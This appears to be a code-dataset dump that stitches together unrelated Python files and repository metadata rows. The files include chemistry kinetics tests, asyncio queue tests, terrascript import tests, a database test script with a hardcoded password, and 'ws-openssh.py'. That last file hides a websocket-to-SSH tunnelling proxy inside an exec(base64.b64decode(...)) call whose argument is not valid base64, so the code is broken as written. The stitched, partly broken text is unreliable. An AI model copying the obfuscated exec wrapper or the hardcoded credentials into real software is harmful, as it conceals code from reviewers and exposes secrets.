self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_repr(self):
"""
Test that a MultiPDepArrhenius object can be reconstructed from its
repr() output with no loss of information.
"""
namespace = {}
exec('kinetics = {0!r}'.format(self.kinetics), globals(), namespace)
self.assertIn('kinetics', namespace)
kinetics = namespace['kinetics']
self.assertEqual(len(self.kinetics.arrhenius), len(kinetics.arrhenius))
self.assertAlmostEqual(self.kinetics.Tmin.value, kinetics.Tmin.value, 4)
self.assertEqual(self.kinetics.Tmin.units, kinetics.Tmin.units)
self.assertAlmostEqual(self.kinetics.Tmax.value, kinetics.Tmax.value, 4)
self.assertEqual(self.kinetics.Tmax.units, kinetics.Tmax.units)
self.assertEqual(self.kinetics.comment, kinetics.comment)
def test_change_rate(self):
"""
Test the PDepMultiArrhenius.change_rate() method.
"""
Tlist = np.array([300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500])
k0list = np.array([self.kinetics.get_rate_coefficient(T, 1e5) for T in Tlist])
self.kinetics.change_rate(2)
for T, kexp in zip(Tlist, k0list):
kact = self.kinetics.get_rate_coefficient(T, 1e5)
self.assertAlmostEqual(2 * kexp, kact, delta=1e-6 * kexp)
def test_generate_reverse_rate_coefficient(self):
"""
Test ability to reverse a reaction rate.
This is a real example from an imported chemkin file.
"""
from rmgpy.species import Species
from rmgpy.molecule import Molecule
from rmgpy.data.kinetics import LibraryReaction
from rmgpy.thermo import NASA, NASAPolynomial
test_reaction = LibraryReaction(reactants=[Species(label="C2H3", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[3.12502,0.00235137,2.36803e-05,-3.35092e-08,1.39444e-11,34524.3,8.81538], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[4.37211,0.00746869,-2.64716e-06,4.22753e-10,-2.44958e-14,33805.2,0.428772], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(285.696,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(108.088,"J/mol/K"), comment="""ATcT3E\nC2H3 <g> ATcT ver. 1.122, DHf298 = 296.91 ± 0.33 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="[CH]=C")], molecular_weight=(27.0452,"amu")),
Species(label="CH2O", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[4.77187,-0.00976266,3.70122e-05,-3.76922e-08,1.31327e-11,-14379.8,0.696586], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[2.91333,0.0067004,-2.55521e-06,4.27795e-10,-2.44073e-14,-14462.2,7.43823], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(-119.527,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(83.1447,"J/mol/K"), comment="""ATcT3E\nH2CO <g> ATcT ver. 1.122, DHf298 = -109.188 ± 0.099 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="C=O")], molecular_weight=(30.026,"amu"))],
products=[Species(label="C2H4", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[3.65151,-0.00535067,5.16486e-05,-6.36869e-08,2.50743e-11,5114.51,5.38561], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[4.14446,0.0102648,-3.61247e-06,5.74009e-10,-3.39296e-14,4190.59,-1.14778], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(42.06,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(133.032,"J/mol/K"), comment="""ATcT3E\nC2H4 <g> ATcT ver. 1.122, DHf298 = 52.45 ± 0.13 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="C=C")], molecular_weight=(28.0532,"amu")),
Species(label="HCO", thermo=NASA(polynomials=[NASAPolynomial(coeffs=[3.97075,-0.00149122,9.54042e-06,-8.8272e-09,2.67645e-12,3842.03,4.4466], Tmin=(200,"K"), Tmax=(1000,"K")), NASAPolynomial(coeffs=[3.85781,0.00264114,-7.44177e-07,1.23313e-10,-8.88959e-15,3616.43,3.92451], Tmin=(1000,"K"), Tmax=(6000,"K"))], Tmin=(200,"K"), Tmax=(6000,"K"), E0=(32.0237,"kJ/mol"), Cp0=(33.2579,"J/mol/K"), CpInf=(58.2013,"J/mol/K"), comment="""HCO <g> ATcT ver. 1.122, DHf298 = 41.803 ± 0.099 kJ/mol - fit JAN17"""), molecule=[Molecule(smiles="[CH]=O")], molecular_weight=(29.018,"amu"))],
kinetics=MultiPDepArrhenius(arrhenius=[PDepArrhenius(pressures=([0.001,0.01,0.1,1,10,100,1000],"atm"),
arrhenius=[Arrhenius(A=(1.1e+07,"cm^3/(mol*s)"), n=1.09, Ea=(1807,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(2.5e+07,"cm^3/(mol*s)"), n=0.993, Ea=(1995,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(2.5e+08,"cm^3/(mol*s)"), n=0.704, Ea=(2596,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(1.4e+10,"cm^3/(mol*s)"), n=0.209, Ea=(3934,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(3.5e+13,"cm^3/(mol*s)"), n=-0.726, Ea=(6944,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(3.3e+14,"cm^3/(mol*s)"), n=-0.866, Ea=(10966,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(17,"cm^3/(mol*s)"), n=3.17, Ea=(9400,"cal/mol"), T0=(1,"K"))]),
PDepArrhenius(pressures=([0.001,0.01,0.1,1,10,100,1000],"atm"),
arrhenius=[Arrhenius(A=(-2.3e+16,"cm^3/(mol*s)"), n=-1.269, Ea=(20617,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-5.2e+16,"cm^3/(mol*s)"), n=-1.366, Ea=(20805,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-1.5e+18,"cm^3/(mol*s)"), n=-1.769, Ea=(22524,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-8.5e+19,"cm^3/(mol*s)"), n=-2.264, Ea=(23862,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-4.4e+23,"cm^3/(mol*s)"), n=-3.278, Ea=(27795,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-4.2e+24,"cm^3/(mol*s)"), n=-3.418, Ea=(31817,"cal/mol"), T0=(1,"K")),
Arrhenius(A=(-2.1e+11,"cm^3/(mol*s)"), n=0.618, Ea=(30251,"cal/mol"), T0=(1,"K"))])
]), duplicate=True)
test_reaction.generate_reverse_rate_coefficient()
| 49.211018 | 639 | 0.583114 | 6,487 | 52,705 | 4.677817 | 0.087868 | 0.088581 | 0.065085 | 0.046762 | 0.843368 | 0.811204 | 0.787939 | 0.769023 | 0.722294 | 0.700676 | 0 | 0.084075 | 0.27468 | 52,705 | 1,070 | 640 | 49.257009 | 0.709611 | 0.134731 | 0 | 0.74818 | 0 | 0.005822 | 0.031056 | 0 | 0 | 0 | 0 | 0 | 0.328967 | 1 | 0.10917 | false | 0 | 0.020378 | 0 | 0.136827 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0cd281cdfd975d9eba8c755de06a2da710fda5d5 | 10,053 | py | Python | websocket/ws-openssh.py | Sangarya/premium | aa880734da5e9916bd70fd222e58894a3e3d7c80 | [
"Apache-2.0"
] | null | null | null | websocket/ws-openssh.py | Sangarya/premium | aa880734da5e9916bd70fd222e58894a3e3d7c80 | [
"Apache-2.0"
] | null | null | null | websocket/ws-openssh.py | Sangarya/premium | aa880734da5e9916bd70fd222e58894a3e3d7c80 | [
"Apache-2.0"
] | 2 | 2021-12-20T17:08:06.000Z | 2022-01-25T13:57:24.000Z | #Compile By GEO GABUT
#My Team : Nusa Tenggara Barat
import base64
exec(base64.b64decode("#!/usr/bin/python
import socket, threading, thread, select, signal, sys, time, getopt

# Listen
LISTENING_ADDR = '0.0.0.0'
if sys.argv[1:]:
	LISTENING_PORT = sys.argv[1]
else:
	LISTENING_PORT = 2095

# Pass
PASS = ''

# CONST
BUFLEN = 4096 * 4
TIMEOUT = 60
DEFAULT_HOST = '127.0.0.1:22'
RESPONSE = 'HTTP/1.1 101 <b><h1><h><font color="fuchsia"> Geo Switching Protocols</font></b>\r\n\r\nContent-Length: 104857600000\r\n\r\n'

class Server(threading.Thread):
    def __init__(self, host, port):
        threading.Thread.__init__(self)
        self.running = False
        self.host = host
        self.port = port
        self.threads = []
        self.threadsLock = threading.Lock()
        self.logLock = threading.Lock()

    def run(self):
        self.soc = socket.socket(socket.AF_INET)
        self.soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.soc.settimeout(2)
        intport = int(self.port)
        self.soc.bind((self.host, intport))
        self.soc.listen(0)
        self.running = True

        try:
            while self.running:
                try:
                    c, addr = self.soc.accept()
                    c.setblocking(1)
                except socket.timeout:
                    continue

                conn = ConnectionHandler(c, self, addr)
                conn.start()
                self.addConn(conn)
        finally:
            self.running = False
            self.soc.close()

    def printLog(self, log):
        self.logLock.acquire()
        print log
        self.logLock.release()

    def addConn(self, conn):
        try:
            self.threadsLock.acquire()
            if self.running:
                self.threads.append(conn)
        finally:
            self.threadsLock.release()

    def removeConn(self, conn):
        try:
            self.threadsLock.acquire()
            self.threads.remove(conn)
        finally:
            self.threadsLock.release()

    def close(self):
        try:
            self.running = False
            self.threadsLock.acquire()

            threads = list(self.threads)
            for c in threads:
                c.close()
        finally:
            self.threadsLock.release()


class ConnectionHandler(threading.Thread):
    def __init__(self, socClient, server, addr):
        threading.Thread.__init__(self)
        self.clientClosed = False
        self.targetClosed = True
        self.client = socClient
        self.client_buffer = ''
        self.server = server
        self.log = 'Connection: ' + str(addr)

    def close(self):
        try:
            if not self.clientClosed:
                self.client.shutdown(socket.SHUT_RDWR)
                self.client.close()
        except:
            pass
        finally:
            self.clientClosed = True

        try:
            if not self.targetClosed:
                self.target.shutdown(socket.SHUT_RDWR)
                self.target.close()
        except:
            pass
        finally:
            self.targetClosed = True

    def run(self):
        try:
            self.client_buffer = self.client.recv(BUFLEN)

            hostPort = self.findHeader(self.client_buffer, 'X-Real-Host')

            if hostPort == '':
                hostPort = DEFAULT_HOST

            split = self.findHeader(self.client_buffer, 'X-Split')

            if split != '':
                self.client.recv(BUFLEN)

            if hostPort != '':
                passwd = self.findHeader(self.client_buffer, 'X-Pass')
				
                if len(PASS) != 0 and passwd == PASS:
                    self.method_CONNECT(hostPort)
                elif len(PASS) != 0 and passwd != PASS:
                    self.client.send('HTTP/1.1 400 WrongPass!\r\n\r\n')
                elif hostPort.startswith('127.0.0.1') or hostPort.startswith('localhost'):
                    self.method_CONNECT(hostPort)
                else:
                    self.client.send('HTTP/1.1 403 Forbidden!\r\n\r\n')
            else:
                print '- No X-Real-Host!'
                self.client.send('HTTP/1.1 400 NoXRealHost!\r\n\r\n')

        except Exception as e:
            self.log += ' - error: ' + e.strerror
            self.server.printLog(self.log)
	    pass
        finally:
            self.close()
            self.server.removeConn(self)

    def findHeader(self, head, header):
        aux = head.find(header + ': ')

        if aux == -1:
            return ''

        aux = head.find(':', aux)
        head = head[aux+2:]
        aux = head.find('\r\n')

        if aux == -1:
            return ''

        return head[:aux];

    def connect_target(self, host):
        i = host.find(':')
        if i != -1:
            port = int(host[i+1:])
            host = host[:i]
        else:
            if self.method=='CONNECT':
                port = 443
            else:
                port = sys.argv[1]

        (soc_family, soc_type, proto, _, address) = socket.getaddrinfo(host, port)[0]

        self.target = socket.socket(soc_family, soc_type, proto)
        self.targetClosed = False
        self.target.connect(address)

    def method_CONNECT(self, path):
        self.log += ' - CONNECT ' + path

        self.connect_target(path)
        self.client.sendall(RESPONSE)
        self.client_buffer = ''

        self.server.printLog(self.log)
        self.doCONNECT()

    def doCONNECT(self):
        socs = [self.client, self.target]
        count = 0
        error = False
        while True:
            count += 1
            (recv, _, err) = select.select(socs, [], socs, 3)
            if err:
                error = True
            if recv:
                for in_ in recv:
		    try:
                        data = in_.recv(BUFLEN)
                        if data:
			    if in_ is self.target:
				self.client.send(data)
                            else:
                                while data:
                                    byte = self.target.send(data)
                                    data = data[byte:]

                            count = 0
			else:
			    break
		    except:
                        error = True
                        break
            if count == TIMEOUT:
                error = True
            if error:
                break


def print_usage():
    print 'Usage: proxy.py -p <port>'
    print '       proxy.py -b <bindAddr> -p <port>'
    print '       proxy.py -b 0.0.0.0 -p 80'

def parse_args(argv):
    global LISTENING_ADDR
    global LISTENING_PORT
    
    try:
        opts, args = getopt.getopt(argv,"hb:p:",["bind=","port="])
    except getopt.GetoptError:
        print_usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print_usage()
            sys.exit()
        elif opt in ("-b", "--bind"):
            LISTENING_ADDR = arg
        elif opt in ("-p", "--port"):
            LISTENING_PORT = int(arg)


def main(host=LISTENING_ADDR, port=LISTENING_PORT):
    print "\n:-------PythonProxy-------:\n"
    print "Listening addr: " + LISTENING_ADDR
    print "Listening port: " + str(LISTENING_PORT) + "\n"
    print ":-------------------------:\n"
    server = Server(LISTENING_ADDR, LISTENING_PORT)
    server.start()
    while True:
        try:
            time.sleep(2)
        except KeyboardInterrupt:
            print 'Stopping...'
            server.close()
            break

#######    parse_args(sys.argv[1:])
if __name__ == '__main__':
    main()
")) | 2,513.25 | 9,986 | 0.997314 | 19 | 10,053 | 527.684211 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082064 | 0.001194 | 10,053 | 4 | 9,986 | 2,513.25 | 0.916443 | 0.004874 | 0 | 0 | 0 | 0 | 0.995701 | 0.995701 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
0ce8bb2359863b350637d0dcc3b26624e409ec37 | 375 | py | Python | lib/tmp102/convertors.py | Lapland-UAS-Tequ/tequ-xbee-ble-sensor | 0ce6ad3d0b55cdc813311ae9ed2e29426b3c677a | [
"MIT"
] | 8 | 2016-05-24T09:24:49.000Z | 2020-05-16T01:42:13.000Z | lib/tmp102/convertors.py | Lapland-UAS-Tequ/tequ-xbee-ble-sensor | 0ce6ad3d0b55cdc813311ae9ed2e29426b3c677a | [
"MIT"
] | 2 | 2017-06-28T04:17:39.000Z | 2018-12-31T18:18:16.000Z | lib/tmp102/convertors.py | Lapland-UAS-Tequ/tequ-xbee-ble-sensor | 0ce6ad3d0b55cdc813311ae9ed2e29426b3c677a | [
"MIT"
] | 6 | 2017-02-15T15:01:58.000Z | 2021-05-21T03:12:10.000Z |
class Fahrenheit(object):
def convert_from(self, temperature):
return (temperature - 32.0) / 1.8
def convert_to(self, temperature):
return (temperature * 1.8) + 32.0
class Kelvin(object):
def convert_from(self, temperature):
return temperature - 273.15
def convert_to(self, temperature):
return temperature + 273.15
| 20.833333 | 41 | 0.645333 | 46 | 375 | 5.173913 | 0.369565 | 0.168067 | 0.352941 | 0.537815 | 0.84874 | 0.84874 | 0.806723 | 0.436975 | 0 | 0 | 0 | 0.071429 | 0.253333 | 375 | 17 | 42 | 22.058824 | 0.778571 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
0b2d6fff2f61054be53ebecf19112b8db79dfd4b | 5,619 | py | Python | pytests/utils/asynctools/test_push_each_to_queue.py | OneManEquipe/thinkerino | 4b9508156371643f31d1d26608e42e3aafcb0153 | [
"MIT"
] | 1 | 2020-05-02T19:44:18.000Z | 2020-05-02T19:44:18.000Z | pytests/utils/asynctools/test_push_each_to_queue.py | OneManEquipe/aitools | 4b9508156371643f31d1d26608e42e3aafcb0153 | [
"MIT"
] | 29 | 2019-08-07T17:49:03.000Z | 2021-08-31T10:25:00.000Z | pytests/utils/asynctools/test_push_each_to_queue.py | OneManEquipe/thinkerino | 4b9508156371643f31d1d26608e42e3aafcb0153 | [
"MIT"
] | null | null | null | """
Tests for aitools.utils.asynctools.push_each_to_queue
Implemented cases:
completion__limited_queue
processes the whole input, with a queue of max_size=1
completion__unlimited_queue
processes the whole input, with an unlimited queue
failing_input__limited_queue
the input raises an exception which is pushed as a result, with a queue of max_size=1
failing_input__unlimited_queue
the input raises an exception which is pushed as a result, with an unlimited queue
cancelled_during_body__limited_queue
the coroutine is cancelled during its own 'await', with a queue of max_size=1
cancelled_while_in_subroutine__limited_queue
the coroutine is cancelled while in a subroutine, with a queue of max_size=1
cancelled_while_in_subroutine__unlimited_queue
the coroutine is cancelled while in a subroutine, with an unlimited queue
NOTE: there is no cancelled_during_body__unlimited_queue, since it doesn't yield control during queue.put
"""
import asyncio
import pytest
from aitools.utils import asynctools
from pytests.utils.asynctools.utils import yield_then_fail, SomeException, step, await_yield_and_log
def test__completion__limited_queue():
iterations = 10
source = asynctools.asynchronize(range(iterations))
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
step(coro)
with pytest.raises(StopIteration):
for i in range(iterations):
assert queue.get_nowait() == i
step(coro)
assert queue.get_nowait() is poison_pill
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__completion__unlimited_queue():
iterations = 10
source = asynctools.asynchronize(range(iterations))
poison_pill = object()
queue = asyncio.Queue(maxsize=0)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
with pytest.raises(StopIteration):
step(coro)
for i in range(iterations):
assert queue.get_nowait() == i
assert queue.get_nowait() is poison_pill
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__failing_input__limited_queue():
iterations = 10
source = yield_then_fail('some_result', iterations)
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
step(coro)
with pytest.raises(StopIteration):
for i in range(iterations):
assert queue.get_nowait() == f"some_result-{i}"
step(coro)
assert isinstance(queue.get_nowait(), SomeException)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__failing_input__unlimited_queue():
iterations = 10
source = yield_then_fail('some_result', iterations)
poison_pill = object()
queue = asyncio.Queue(maxsize=0)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
with pytest.raises(StopIteration):
step(coro)
for i in range(iterations):
assert queue.get_nowait() == f"some_result-{i}"
assert isinstance(queue.get_nowait(), SomeException)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__cancelled_during_body__limited_queue():
log = []
iterations = 10
source = await_yield_and_log(iterations, log=log)
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
for i in range(iterations - 3):
step(coro)
step(coro)
assert queue.get_nowait() == i
assert log == list(range(iterations - 2))
with pytest.raises(asyncio.CancelledError):
coro.throw(asyncio.CancelledError)
assert len(log) == iterations - 1
assert isinstance(log[-1], GeneratorExit)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__cancelled_while_in_subroutine__limited_queue():
log = []
iterations = 10
source = await_yield_and_log(iterations, log=log)
poison_pill = object()
queue = asyncio.Queue(maxsize=1)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
for i in range(iterations - 3):
step(coro)
step(coro)
assert queue.get_nowait() == i
assert log == list(range(iterations - 2))
step(coro)
assert queue.get_nowait() == iterations - 3
assert log == list(range(iterations - 2))
with pytest.raises(asyncio.CancelledError):
coro.throw(asyncio.CancelledError)
assert len(log) == iterations - 1
assert isinstance(log[-1], asyncio.CancelledError)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
def test__cancelled_while_in_subroutine__unlimited_queue():
log = []
iterations = 10
source = await_yield_and_log(iterations, log=log)
poison_pill = object()
queue = asyncio.Queue(maxsize=0)
coro = asynctools.push_each_to_queue(source, queue=queue, poison_pill=poison_pill)
step(coro)
for i in range(iterations - 3):
step(coro)
assert queue.get_nowait() == i
assert log == list(range(iterations - 3))
with pytest.raises(asyncio.CancelledError):
coro.throw(asyncio.CancelledError)
assert len(log) == iterations - 2
assert isinstance(log[-1], asyncio.CancelledError)
with pytest.raises(asyncio.QueueEmpty):
queue.get_nowait()
| 30.538043 | 105 | 0.708489 | 727 | 5,619 | 5.237964 | 0.127923 | 0.060399 | 0.069853 | 0.052521 | 0.878414 | 0.85583 | 0.815389 | 0.805935 | 0.800158 | 0.800158 | 0 | 0.008698 | 0.201993 | 5,619 | 183 | 106 | 30.704918 | 0.840544 | 0.179747 | 0 | 0.869565 | 0 | 0 | 0.011302 | 0 | 0 | 0 | 0 | 0 | 0.191304 | 1 | 0.06087 | false | 0 | 0.034783 | 0 | 0.095652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0b614da7391ad72d54d9abed143f9465dca0a387 | 2,949 | py | Python | tests/test_provider_hashicorp_tfe.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_hashicorp_tfe.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_hashicorp_tfe.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_hashicorp_tfe.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:28:36 UTC)
def test_provider_import():
import terrascript.provider.hashicorp.tfe
def test_resource_import():
from terrascript.resource.hashicorp.tfe import tfe_agent_pool
from terrascript.resource.hashicorp.tfe import tfe_agent_token
from terrascript.resource.hashicorp.tfe import tfe_notification_configuration
from terrascript.resource.hashicorp.tfe import tfe_oauth_client
from terrascript.resource.hashicorp.tfe import tfe_organization
from terrascript.resource.hashicorp.tfe import tfe_organization_membership
from terrascript.resource.hashicorp.tfe import tfe_organization_token
from terrascript.resource.hashicorp.tfe import tfe_policy_set
from terrascript.resource.hashicorp.tfe import tfe_policy_set_parameter
from terrascript.resource.hashicorp.tfe import tfe_registry_module
from terrascript.resource.hashicorp.tfe import tfe_run_trigger
from terrascript.resource.hashicorp.tfe import tfe_sentinel_policy
from terrascript.resource.hashicorp.tfe import tfe_ssh_key
from terrascript.resource.hashicorp.tfe import tfe_team
from terrascript.resource.hashicorp.tfe import tfe_team_access
from terrascript.resource.hashicorp.tfe import tfe_team_member
from terrascript.resource.hashicorp.tfe import tfe_team_members
from terrascript.resource.hashicorp.tfe import tfe_team_organization_member
from terrascript.resource.hashicorp.tfe import tfe_team_token
from terrascript.resource.hashicorp.tfe import tfe_variable
from terrascript.resource.hashicorp.tfe import tfe_workspace
def test_datasource_import():
from terrascript.data.hashicorp.tfe import tfe_agent_pool
from terrascript.data.hashicorp.tfe import tfe_ip_ranges
from terrascript.data.hashicorp.tfe import tfe_oauth_client
from terrascript.data.hashicorp.tfe import tfe_organization
from terrascript.data.hashicorp.tfe import tfe_organization_membership
from terrascript.data.hashicorp.tfe import tfe_organizations
from terrascript.data.hashicorp.tfe import tfe_outputs
from terrascript.data.hashicorp.tfe import tfe_slug
from terrascript.data.hashicorp.tfe import tfe_ssh_key
from terrascript.data.hashicorp.tfe import tfe_team
from terrascript.data.hashicorp.tfe import tfe_team_access
from terrascript.data.hashicorp.tfe import tfe_workspace
from terrascript.data.hashicorp.tfe import tfe_workspace_ids
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.hashicorp.tfe
#
# t = terrascript.provider.hashicorp.tfe.tfe()
# s = str(t)
#
# assert 'https://github.com/hashicorp/terraform-provider-tfe' in s
# assert '0.26.1' in s
| 31.709677 | 81 | 0.803323 | 389 | 2,949 | 5.904884 | 0.228792 | 0.19852 | 0.266434 | 0.31084 | 0.771006 | 0.734872 | 0.734872 | 0.556813 | 0.093165 | 0 | 0 | 0.006299 | 0.138691 | 2,949 | 92 | 82 | 32.054348 | 0.898032 | 0.164123 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01087 | 0 | 1 | 0.078947 | true | 0 | 1 | 0 | 1.078947 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
0b7c9cc9a3f73c4c1f6c59c0a9dabbf43af570fd | 15,726 | py | Python | skgaip/tspdb/tspdb/tests/test.py | danielsuo/toy_flood | 471d3c4091d86d4a00fbf910937d4e60fdaf79a1 | [
"MIT"
] | 43 | 2019-12-10T00:05:51.000Z | 2022-03-31T21:21:20.000Z | skgaip/tspdb/tspdb/tests/test.py | danielsuo/toy_flood | 471d3c4091d86d4a00fbf910937d4e60fdaf79a1 | [
"MIT"
] | 5 | 2021-05-09T01:12:31.000Z | 2022-03-29T17:34:15.000Z | skgaip/tspdb/tspdb/tests/test.py | danielsuo/toy_flood | 471d3c4091d86d4a00fbf910937d4e60fdaf79a1 | [
"MIT"
] | 14 | 2020-01-13T21:20:07.000Z | 2022-03-31T02:11:26.000Z |
import numpy as np
from tspdb.src.database_module.sql_imp import SqlImplementation
from tspdb.src.pindex.predict import get_prediction_range, get_prediction
from tspdb.src.pindex.pindex_managment import TSPI, load_pindex
from tspdb.src.pindex.pindex_utils import index_ts_mapper
import time
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
import timeit
import pandas as pd
# t = time.time()
# A = load_pindex(interface, 'ts_basic2_pindex')
# print (time.time() - t)
# print(' ')
# t = time.time()
# a = interface.get_time_series('ts_basic2',1,10**6, index_col = 'row_id')
# print (time.time() - t)
# print(' ')
def update_test(init_points = 10**4 , update_points = [1000,100,5000,10000], T = 1000, direct_var = True ,index_name = 'ts_basic_test_pindex'):
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
df = pd.DataFrame(data ={'ts': np.arange(init_points).astype('float')})
interface.create_table('ts_basic_test', df, 'row_id', index_label='row_id')
time_series_table = ['ts_basic_test','ts', 'row_id']
T0 = 1000
gamma = 0.5
k = 2
k_var = 1
TSPD = TSPI(_dir = 'C:/Program Files/PostgreSQL/10/data/', agg_interval = 5, T = T,T_var = T, rank = k, rank_var = k_var, col_to_row_ratio = 10, index_name = index_name,gamma = gamma, interface= interface ,time_series_table = time_series_table, direct_var = direct_var )
TSPD.create_index()
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
for points in update_points:
df = pd.DataFrame(data = {'ts':np.arange(init_points,points+init_points).astype('float')}, index = np.arange(init_points,points+init_points) )
interface.bulk_insert('ts_basic_test', df, index_label='row_id')
init_points += points
print ('successfully updated %s points' %points)
def ts_table_tests(init_points = 10**4 , update_points = [1000,100,5000,10000], T = 1000, direct_var = True ,index_name = 'ts_basic_ts_pindex'):
interface = SqlImplementation(driver="postgresql", host="localhost", database="querytime_test",user="aalomar",password="AAmit32lids")
df = pd.DataFrame(data ={'ts': np.arange(init_points).astype('float')})
timestamps = pd.date_range('2012-10-01 00:00:00', periods = init_points+1, freq='5s')
end = timestamps[-1]
df.index = timestamps[:-1]
interface.create_table('ts_basic_ts', df, 'timestamp', index_label='timestamp')
time_series_table = ['ts_basic_ts','ts', 'timestamp']
T0 = 1000
gamma = 0.5
k = 2
k_var = 1
